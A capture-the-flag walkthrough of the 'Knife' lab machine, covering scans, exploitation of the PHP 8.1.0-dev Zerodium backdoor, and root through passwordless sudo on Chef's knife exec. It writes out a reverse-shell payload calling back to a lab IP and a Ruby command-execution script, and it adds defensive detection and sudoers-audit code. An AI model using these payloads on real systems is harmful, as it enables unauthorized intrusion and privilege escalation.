Easy L-Knife
Information gathering
First look
Browse to the IP
None of the options on the page can be clicked.
Port scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
| 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Directory scan
[16:44:13] Starting:
[16:44:25] 403 - 277B - /.ht_wsr.txt
[16:44:28] 403 - 277B - /.htaccess_extra
[16:44:28] 403 - 277B - /.htaccessOLD
[16:44:28] 403 - 277B - /.htaccess.orig
[16:44:28] 403 - 277B - /.htaccessOLD2
[16:44:28] 403 - 277B - /.htaccess.sample
[16:44:28] 403 - 277B - /.htaccess.save
[16:44:28] 403 - 277B - /.htaccessBAK
[16:44:28] 403 - 277B - /.htaccess_orig
[16:44:28] 403 - 277B - /.htm
[16:44:28] 403 - 277B - /.htaccess_sc
[16:44:28] 403 - 277B - /.html
[16:44:28] 403 - 277B - /.htaccess.bak1
[16:44:28] 403 - 277B - /.htpasswd_test
[16:44:28] 403 - 277B - /.htpasswds
[16:44:28] 403 - 277B - /.httr-oauth
[16:46:22] 403 - 277B - /server-status
[16:46:22] 403 - 277B - /server-status/
Nothing in the directories either.
Run a batch of PoC checks against it.
And it really did find something.
Straight in.
Initial access
PHP 8.1.0-dev Zerodium Backdoor
PHP 8.1.0-dev was published with a backdoor on 28 March 2021; the backdoor was discovered and removed quickly. If this build of PHP is running on a server, an attacker can execute arbitrary code by sending a User-Agentt header:
User-Agentt: zerodiumsystem("whoami");
Go straight for a reverse shell:
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1'");
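As an added defender-side example (not code from this write-up or from PHP), the check below flags requests that would trigger the backdoor described above and responses that advertise the backdoored build. It mirrors the published backdoor condition: the User-Agentt value must contain "zerodium" and the code that gets evaluated starts at byte offset 8 of the value; the X-Powered-By banner check assumes the server exposes its PHP version, and all sample traffic is constructed.

```python
# Added example (not from the original write-up): flag HTTP requests that would
# trigger the PHP 8.1.0-dev backdoor, and responses that advertise that build.
# Mirrors the published backdoor condition: the User-Agentt value must contain
# "zerodium", and the code that gets eval'ed starts at byte offset 8 of the value.
# Sample request/response bytes are constructed for this demo.
from typing import Dict, List, Optional, Tuple

BACKDOOR_HEADER = "user-agentt"      # doubled "t": no normal client sends this header
BACKDOOR_MARKER = "zerodium"
VULNERABLE_BUILD = "PHP/8.1.0-dev"   # seen only on servers that expose X-Powered-By (assumption)

def parse_headers(raw: bytes) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP message into its start line and a lower-cased header map.
    Repeated headers are kept as a list so a duplicate cannot hide the first one."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def detect_backdoor_trigger(raw_request: bytes) -> Optional[str]:
    """Return the PHP code the backdoor would evaluate for this request, or None."""
    _, headers = parse_headers(raw_request)
    for value in headers.get(BACKDOOR_HEADER, []):
        if BACKDOOR_MARKER in value:
            return value[len(BACKDOOR_MARKER):]   # offset 8, exactly as the backdoor does
    return None

def advertises_backdoored_php(raw_response: bytes) -> bool:
    """True if the response's X-Powered-By banner names the backdoored dev build."""
    _, headers = parse_headers(raw_response)
    return any(VULNERABLE_BUILD in v for v in headers.get("x-powered-by", []))

# Constructed sample traffic.
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: target.example\r\n"
                  b"User-Agent: Mozilla/5.0\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                   b"X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>")

if __name__ == "__main__":
    print("code the backdoor would run:", detect_backdoor_trigger(SAMPLE_REQUEST))
    print("backdoored build advertised:", advertises_backdoored_php(SAMPLE_RESPONSE))
```

A WAF or reverse proxy in front of the application can drop any request carrying this header outright, since no legitimate client sends it.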
Foothold
Stealing the SSH private key (failed)
Grabbed ~/.ssh/id_rsa, but it requires a passphrase.
Get a session in msf
So just get a session in msf.
Spawn a pseudo-terminal with python:
python3 -c "import pty;pty.spawn('/bin/bash')"
Privilege escalation
linpeas
sudo -l: /usr/bin/knife can be run via sudo without a password.
It is a symlink pointing to /opt/chef-workstation/bin/knife; opening it reveals a Ruby script:
#!/opt/chef-workstation/embedded/bin/ruby --disable-gems
#--APP_BUNDLER_BINSTUB_FORMAT_VERSION=1--
require "rubygems"
begin
# this works around rubygems/rubygems#2196 and can be removed in rubygems > 2.7.6
require "rubygems/bundler_version_finder"
rescue LoadError
# probably means rubygems is too old or too new to have this class, and we don't care
end
# avoid appbundling if we are definitely running within a Bundler bundle.
# most likely the check for defined?(Bundler) is enough since we don't require
# bundler above, but just for paranoia's sake also we test to see if Bundler is
# really doing its thing or not.
unless defined?(Bundler) && Bundler.instance_variable_defined?("@load")
ENV["GEM_HOME"] = ENV["GEM_PATH"] = nil unless ENV["APPBUNDLER_ALLOW_RVM"] == "true"
::Gem.clear_paths
gem "activesupport", "= 5.2.4.5"
gem "addressable", "= 2.7.0"
gem "appbundler", "= 0.13.2"
gem "artifactory", "= 3.0.15"
gem "ast", "= 2.4.2"
gem "aws-eventstream", "= 1.1.0"
gem "aws-partitions", "= 1.427.0"
gem "aws-sdk-apigateway", "= 1.59.0"
gem "aws-sdk-apigatewayv2", "= 1.31.0"
gem "aws-sdk-applicationautoscaling", "= 1.49.0"
gem "aws-sdk-athena", "= 1.35.0"
gem "aws-sdk-autoscaling", "= 1.53.0"
gem "aws-sdk-batch", "= 1.43.0"
gem "aws-sdk-budgets", "= 1.37.0"
gem "aws-sdk-cloudformation", "= 1.47.0"
gem "aws-sdk-cloudfront", "= 1.48.0"
gem "aws-sdk-cloudhsm", "= 1.28.0"
gem "aws-sdk-cloudhsmv2", "= 1.32.0"
gem "aws-sdk-cloudtrail", "= 1.33.0"
gem "aws-sdk-cloudwatch", "= 1.49.0"
gem "aws-sdk-cloudwatchevents", "= 1.40.0"
gem "aws-sdk-cloudwatchlogs", "= 1.39.0"
gem "aws-sdk-codecommit", "= 1.41.0"
gem "aws-sdk-codedeploy", "= 1.38.0"
gem "aws-sdk-codepipeline", "= 1.41.0"
gem "aws-sdk-cognitoidentity", "= 1.29.0"
gem "aws-sdk-cognitoidentityprovider", "= 1.48.0"
gem "aws-sdk-configservice", "= 1.57.0"
gem "aws-sdk-core", "= 3.112.0"
gem "aws-sdk-costandusagereportservice", "= 1.29.0"
gem "aws-sdk-databasemigrationservice", "= 1.50.0"
gem "aws-sdk-dynamodb", "= 1.59.0"
gem "aws-sdk-ec2", "= 1.224.0"
gem "aws-sdk-ecr", "= 1.41.0"
gem "aws-sdk-ecs", "= 1.74.0"
gem "aws-sdk-efs", "= 1.37.0"
gem "aws-sdk-eks", "= 1.48.0"
gem "aws-sdk-elasticache", "= 1.53.0"
gem "aws-sdk-elasticbeanstalk", "= 1.41.0"
gem "aws-sdk-elasticloadbalancing", "= 1.30.0"
gem "aws-sdk-elasticloadbalancingv2", "= 1.60.0"
gem "aws-sdk-elasticsearchservice", "= 1.48.0"
gem "aws-sdk-firehose", "= 1.36.0"
gem "aws-sdk-glue", "= 1.82.0"
gem "aws-sdk-guardduty", "= 1.44.0"
gem "aws-sdk-iam", "= 1.48.0"
gem "aws-sdk-kafka", "= 1.34.0"
gem "aws-sdk-kinesis", "= 1.31.0"
gem "aws-sdk-kms", "= 1.42.0"
gem "aws-sdk-lambda", "= 1.59.0"
gem "aws-sdk-organizations", "= 1.55.0"
gem "aws-sdk-ram", "= 1.22.0"
gem "aws-sdk-rds", "= 1.114.0"
gem "aws-sdk-redshift", "= 1.54.0"
gem "aws-sdk-route53", "= 1.46.0"
gem "aws-sdk-route53domains", "= 1.29.0"
gem "aws-sdk-route53resolver", "= 1.23.0"
gem "aws-sdk-s3", "= 1.88.1"
gem "aws-sdk-secretsmanager", "= 1.43.0"
gem "aws-sdk-securityhub", "= 1.40.0"
gem "aws-sdk-servicecatalog", "= 1.57.0"
gem "aws-sdk-ses", "= 1.37.0"
gem "aws-sdk-shield", "= 1.34.0"
gem "aws-sdk-sms", "= 1.28.0"
gem "aws-sdk-sns", "= 1.38.0"
gem "aws-sdk-sqs", "= 1.36.0"
gem "aws-sdk-ssm", "= 1.104.0"
gem "aws-sdk-states", "= 1.37.0"
gem "aws-sdk-transfer", "= 1.29.0"
gem "aws-sigv4", "= 1.2.2"
gem "axiom-types", "= 0.1.1"
gem "azure_graph_rbac", "= 0.17.2"
gem "azure_mgmt_compute", "= 0.21.1"
gem "azure_mgmt_key_vault", "= 0.17.7"
gem "azure_mgmt_network", "= 0.26.0"
gem "azure_mgmt_resources", "= 0.18.1"
gem "azure_mgmt_security", "= 0.19.0"
gem "azure_mgmt_storage", "= 0.22.0"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "bcrypt_pbkdf", "= 1.1.0.rc2"
gem "berkshelf", "= 7.2.0"
gem "binding_of_caller", "= 1.0.0"
gem "builder", "= 3.2.4"
gem "byebug", "= 11.1.3"
gem "chef", "= 16.10.8"
gem "chef", "= 16.10.8"
gem "chef-apply", "= 0.5.3"
gem "chef-bin", "= 16.10.8"
gem "chef-cli", "= 3.1.1"
gem "chef-config", "= 16.10.8"
gem "chef-telemetry", "= 1.0.14"
gem "chef-utils", "= 16.10.8"
gem "chef-vault", "= 4.1.0"
gem "chef-zero", "= 15.0.4"
gem "chef_deprecations", "= 0.1.2"
gem "cheffish", "= 16.0.12"
gem "chefspec", "= 9.2.1"
gem "chefstyle", "= 1.7.1"
gem "citrus", "= 3.0.2"
gem "cleanroom", "= 1.0.0"
gem "coderay", "= 1.1.3"
gem "coercible", "= 1.0.0"
gem "concurrent-ruby", "= 1.1.8"
gem "cookbook-omnifetch", "= 0.11.1"
gem "cookstyle", "= 7.8.0"
gem "debug_inspector", "= 1.0.0"
gem "declarative", "= 0.0.20"
gem "declarative-option", "= 0.1.0"
gem "dep-selector-libgecode", "= 1.3.5"
gem "dep_selector", "= 1.0.6"
gem "descendants_tracker", "= 0.0.4"
gem "diff-lcs", "= 1.3"
gem "docker-api", "= 2.0.0"
gem "domain_name", "= 0.5.20190701"
gem "droplet_kit", "= 3.13.0"
gem "ed25519", "= 1.2.4"
gem "equalizer", "= 0.0.11"
gem "erubi", "= 1.10.0"
gem "erubis", "= 2.7.0"
gem "excon", "= 0.79.0"
gem "faraday", "= 1.3.0"
gem "faraday-cookie_jar", "= 0.0.7"
gem "faraday-net_http", "= 1.0.1"
gem "faraday_middleware", "= 1.0.0"
gem "fauxhai-ng", "= 8.7.0"
gem "ffi", "= 1.14.2"
gem "ffi", "= 1.14.2"
gem "ffi", "= 1.14.2"
gem "ffi-libarchive", "= 1.0.17"
gem "ffi-yajl", "= 2.3.4"
gem "filesize", "= 0.2.0"
gem "fog-core", "= 2.2.3"
gem "fog-json", "= 1.2.0"
gem "fog-openstack", "= 1.0.11"
gem "formatador", "= 0.2.5"
gem "fuzzyurl", "= 0.9.0"
gem "gcewinpass", "= 1.1.0"
gem "google-api-client", "= 0.42.2"
gem "googleauth", "= 0.14.0"
gem "gssapi", "= 1.3.1"
gem "guard", "= 2.16.2"
gem "gyoku", "= 1.3.1"
gem "hashie", "= 4.1.0"
gem "highline", "= 2.0.3"
gem "http-cookie", "= 1.0.3"
gem "httpclient", "= 2.8.3"
gem "i18n", "= 1.8.9"
gem "ice_nine", "= 0.11.2"
gem "inifile", "= 3.0.0"
gem "iniparse", "= 1.5.0"
gem "inspec", "= 4.26.4"
gem "inspec-bin", "= 4.26.4"
gem "inspec-core", "= 4.26.4"
gem "ipaddress", "= 0.8.3"
gem "jmespath", "= 1.4.0"
gem "json", "= 2.5.1"
gem "jwt", "= 2.2.2"
gem "kartograph", "= 0.2.8"
gem "kitchen-azurerm", "= 1.5.0"
gem "kitchen-digitalocean", "= 0.11.2"
gem "kitchen-dokken", "= 2.11.2"
gem "kitchen-ec2", "= 3.8.0"
gem "kitchen-google", "= 2.2.0"
gem "kitchen-hyperv", "= 0.5.5"
gem "kitchen-inspec", "= 2.3.0"
gem "kitchen-openstack", "= 5.0.1"
gem "kitchen-vagrant", "= 1.8.0"
gem "kitchen-vcenter", "= 2.9.8"
gem "knife-azure", "= 3.0.6"
gem "knife-cloud", "= 4.0.15"
gem "knife-ec2", "= 2.1.3"
gem "knife-google", "= 5.0.8"
gem "knife-opc", "= 0.4.7"
gem "knife-tidy", "= 2.1.2"
gem "knife-vcenter", "= 5.0.5"
gem "knife-vsphere", "= 4.1.7"
gem "knife-windows", "= 4.0.6"
gem "kramdown", "= 2.3.0"
gem "kramdown-parser-gfm", "= 1.1.0"
gem "libyajl2", "= 1.2.0"
gem "license-acceptance", "= 2.1.13"
gem "listen", "= 3.4.1"
gem "little-plugger", "= 1.1.4"
gem "lockfile", "= 2.1.3"
gem "logging", "= 2.3.0"
gem "lumberjack", "= 1.2.8"
gem "mdl", "= 0.11.0"
gem "memoist", "= 0.16.2"
gem "method_source", "= 1.0.0"
gem "mime-types", "= 3.3.1"
gem "mime-types-data", "= 3.2021.0212"
gem "mini_mime", "= 1.0.2"
gem "mini_portile2", "= 2.4.0"
gem "minitar", "= 0.9"
gem "minitest", "= 5.13.0"
gem "mixlib-archive", "= 1.1.4"
gem "mixlib-archive", "= 1.1.4"
gem "mixlib-authentication", "= 3.0.7"
gem "mixlib-cli", "= 2.1.8"
gem "mixlib-config", "= 3.0.9"
gem "mixlib-install", "= 3.12.5"
gem "mixlib-log", "= 3.0.9"
gem "mixlib-shellout", "= 3.2.5"
gem "mixlib-shellout", "= 3.2.5"
gem "mixlib-versioning", "= 1.2.12"
gem "molinillo", "= 0.7.0"
gem "ms_rest", "= 0.7.6"
gem "ms_rest_azure", "= 0.12.0"
gem "multi_json", "= 1.15.0"
gem "multipart-post", "= 2.1.1"
gem "nenv", "= 0.3.0"
gem "net-ping", "= 2.0.8"
gem "net-scp", "= 3.0.0"
gem "net-sftp", "= 3.0.0"
gem "net-ssh", "= 6.1.0"
gem "net-ssh-gateway", "= 2.0.0"
gem "net-ssh-multi", "= 1.2.1"
gem "netaddr", "= 1.5.1"
gem "nokogiri", "= 1.10.10"
gem "nokogiri", "= 1.10.10"
gem "nokogiri", "= 1.10.10"
gem "nori", "= 2.6.0"
gem "notiffany", "= 0.1.3"
gem "octokit", "= 4.20.0"
gem "ohai", "= 16.10.6"
gem "optimist", "= 3.0.1"
gem "os", "= 1.1.1"
gem "parallel", "= 1.20.1"
gem "parser", "= 3.0.0.0"
gem "parslet", "= 1.8.2"
gem "pastel", "= 0.8.0"
gem "plist", "= 3.6.0"
gem "proxifier", "= 1.0.3"
gem "pry", "= 0.13.1"
gem "pry-byebug", "= 3.9.0"
gem "pry-remote", "= 0.1.8"
gem "pry-stack_explorer", "= 0.6.1"
gem "public_suffix", "= 4.0.6"
gem "r18n-core", "= 4.0.0"
gem "r18n-desktop", "= 4.0.0"
gem "rack", "= 2.2.3"
gem "rainbow", "= 3.0.0"
gem "rake", "= 13.0.1"
gem "rb-fsevent", "= 0.10.4"
gem "rb-inotify", "= 0.10.1"
gem "rb-readline", "= 0.5.5"
gem "rbvmomi", "= 3.0.0"
gem "regexp_parser", "= 2.0.3"
gem "representable", "= 3.0.4"
gem "resource_kit", "= 0.1.7"
gem "retriable", "= 3.1.2"
gem "retryable", "= 3.0.5"
gem "rexml", "= 3.2.4"
gem "rspec", "= 3.10.0"
gem "rspec-core", "= 3.10.1"
gem "rspec-expectations", "= 3.10.1"
gem "rspec-its", "= 1.3.0"
gem "rspec-mocks", "= 3.10.2"
gem "rspec-support", "= 3.10.2"
gem "rubocop", "= 1.10.0"
gem "rubocop-ast", "= 1.4.1"
gem "ruby-progressbar", "= 1.11.0"
gem "ruby-shadow", "= 2.5.0"
gem "ruby2_keywords", "= 0.0.4"
gem "rubyntlm", "= 0.6.3"
gem "rubyzip", "= 2.3.0"
gem "sawyer", "= 0.8.2"
gem "semverse", "= 3.0.0"
gem "shellany", "= 0.0.1"
gem "signet", "= 0.14.1"
gem "slop", "= 3.6.0"
gem "solve", "= 4.0.4"
gem "sshkey", "= 2.0.0"
gem "sslshake", "= 1.3.1"
gem "strings", "= 0.2.0"
gem "strings-ansi", "= 0.2.0"
gem "syslog-logger", "= 1.6.8"
gem "test-kitchen", "= 2.10.0"
gem "thor", "= 1.1.0"
gem "thread_safe", "= 0.3.6"
gem "timeliness", "= 0.3.10"
gem "toml-rb", "= 2.0.1"
gem "tomlrb", "= 1.3.0"
gem "train", "= 3.4.9"
gem "train-aws", "= 0.1.35"
gem "train-core", "= 3.4.9"
gem "train-habitat", "= 0.2.22"
gem "train-winrm", "= 0.2.12"
gem "tty-box", "= 0.7.0"
gem "tty-color", "= 0.6.0"
gem "tty-cursor", "= 0.7.1"
gem "tty-prompt", "= 0.23.0"
gem "tty-reader", "= 0.9.0"
gem "tty-screen", "= 0.8.1"
gem "tty-spinner", "= 0.9.3"
gem "tty-table", "= 0.12.0"
gem "tzinfo", "= 1.2.9"
gem "uber", "= 0.1.0"
gem "unf", "= 0.1.4"
gem "unf_ext", "= 0.0.7.7"
gem "unf_ext", "= 0.0.7.7"
gem "unf_ext", "= 0.0.7.7"
gem "unicode-display_width", "= 1.7.0"
gem "unicode_utils", "= 1.4.0"
gem "uuidtools", "= 2.2.0"
gem "virtus", "= 1.0.5"
gem "vsphere-automation-appliance", "= 0.4.7"
gem "vsphere-automation-cis", "= 0.4.7"
gem "vsphere-automation-content", "= 0.4.7"
gem "vsphere-automation-runtime", "= 0.4.7"
gem "vsphere-automation-sdk", "= 0.4.7"
gem "vsphere-automation-vapi", "= 0.4.7"
gem "vsphere-automation-vcenter", "= 0.4.7"
gem "webrick", "= 1.7.0"
gem "winrm", "= 2.3.6"
gem "winrm-elevated", "= 1.2.3"
gem "winrm-fs", "= 1.3.5"
gem "wisper", "= 2.0.1"
gem "wmi-lite", "= 1.0.5"
gem "yard", "= 0.9.26"
gem "chef", "= 16.10.8"
gem "bundler" # force activation of bundler to avoid unresolved specs if there are multiple bundler versions
spec = Gem::Specification.find_by_name("chef", "= 16.10.8")
else
spec = Gem::Specification.find_by_name("chef")
end
unless Gem::Specification.unresolved_deps.empty?
$stderr.puts "APPBUNDLER WARNING: unresolved deps are CRITICAL performance bug, this MUST be fixed"
Gem::Specification.reset
end
bin_file = spec.bin_file("knife")
Kernel.load(bin_file)
chef-knife
Knife is Chef's command-line tool for interacting with the Chef server. One uses it to upload cookbooks and manage other aspects of Chef. It provides the interface between the ChefDK (repo) on the local machine and the Chef server. It helps with managing
Try running it:
sudo /usr/bin/knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)
Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.
Research
What is Chef
Chef has three important concepts (as shown in the figure above):
Roughly, they cooperate like this: the Workstation uploads resources (or rather, commands to be run) to the Chef Server, and the Nodes automatically fetch their own tasks from the Chef Server and execute them locally, so one general can command a whole army :smirk:.
- Chef Server
Stores all resources uploaded from the Workstation, plus shared data such as users (in PostgreSQL). You could simply call it the resource server; everyone communicates with it (via RabbitMQ). It ships with an online management tool called chef-server-webui (using Nginx, including its REST API).
Chef Server can only be installed on Linux.
- Workstation
Simply put, the administrator's machine; it uses the installed knife tool to remotely operate on resources on the Chef Server, register Nodes, and so on.
It can be installed on any system, including Windows.
- Nodes
Client machines; each has a tool called Chef-Client installed, which automatically fetches from the Chef Server the list of commands it has to run.
They can run on any system, including Windows.
What is Knife
Knife is Chef's command-line tool for interacting with the Chef server. People use it to upload cookbooks and manage other aspects of Chef.
Finding the attack point: knife exec
knife needs a sub-command to run (Chef - Knife Setup | Chef Tutorial).
Among them I found an interesting sub-command: knife exec
Ask GPT:
knife exec is a sub-command of Chef's knife tool that lets you interact with the Chef Infra Server by executing Ruby code. This command can be used to run arbitrary Ruby scripts, manipulate Chef resources, or automate certain tasks.
🤔 So what if I create a malicious .rb file... PoC as follows:
#!/usr/bin/env ruby
# knife exec evaluates this file inside the knife process; the requires are not
# needed for the PoC itself, they are just what a normal knife script would load.
require 'chef/api_client'
require 'chef/node'
bash_command = 'whoami'
puts "Executing bash command: #{bash_command}"
system(bash_command)
Change the command to bash -p
and privilege escalation is achieved.
Summary
This machine was quite easy; I got a shallow understanding of Chef and of the Ruby language.
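As an added defender-side example (not code from this write-up or from Chef), the audit below parses sudoers-style rules and flags the pattern exploited above: a passwordless sudo entry for knife with no argument restriction, or one that pins the exec sub-command. A rule that pins a harmless invocation such as "knife node list" passes, because sudo matches the arguments exactly. User names, paths and rule lines are constructed.

```python
# Added example (not from the write-up): audit sudoers rules for entries that let a
# user run knife as root with unrestricted arguments, which is what turned
# "sudo knife exec" into a root shell here. Rule lines and user names are constructed.
import re
from dataclasses import dataclass
from typing import List

# sudo targets that run caller-supplied code unless their arguments are pinned;
# knife is the one from this write-up ("exec" evaluates a Ruby file as the sudo user).
CODE_EXEC_COMMANDS = {"knife": "exec"}
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

@dataclass
class Finding:
    user: str
    command: str
    nopasswd: bool
    reason: str

def audit_sudoers(lines: List[str]) -> List[Finding]:
    """Return one Finding per rule that lets a user run arbitrary code as another user."""
    findings: List[Finding] = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()           # drop comments and blank lines
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            words = cmd.split()
            if cmd == "ALL":
                findings.append(Finding(m.group("user"), cmd, nopasswd, "ALL: any command"))
                continue
            sub = CODE_EXEC_COMMANDS.get(words[0].rsplit("/", 1)[-1])
            if sub is not None and len(words) == 1:    # no argument list: every sub-command, exec included
                findings.append(Finding(m.group("user"), cmd, nopasswd,
                                        f"unrestricted {words[0]}: '{sub}' runs arbitrary Ruby"))
            elif sub is not None and sub in words[1:]:  # arguments pinned to the dangerous sub-command
                findings.append(Finding(m.group("user"), cmd, nopasswd, f"'{sub}' explicitly allowed"))
            # a rule pinning a harmless invocation such as "knife node list" is not flagged
    return findings

# Constructed sample: rule 3 mirrors what sudo -l showed on the box; rule 4 is the
# restricted form an administrator should use instead (sudo matches the arguments exactly).
SAMPLE_SUDOERS = [
    "Defaults env_reset", "root ALL=(ALL:ALL) ALL",
    "webuser ALL=(root) NOPASSWD: /usr/bin/knife",
    "ops ALL=(root) NOPASSWD: /usr/bin/knife node list",
    "deploy ALL=(root) /usr/bin/knife exec /opt/scripts/report.rb  # only as safe as that file's permissions",
]
```

Run it over the output of `sudo -l` or the site's sudoers fragments; every Finding with nopasswd=True on a knife binary is the exact condition this box was rooted through.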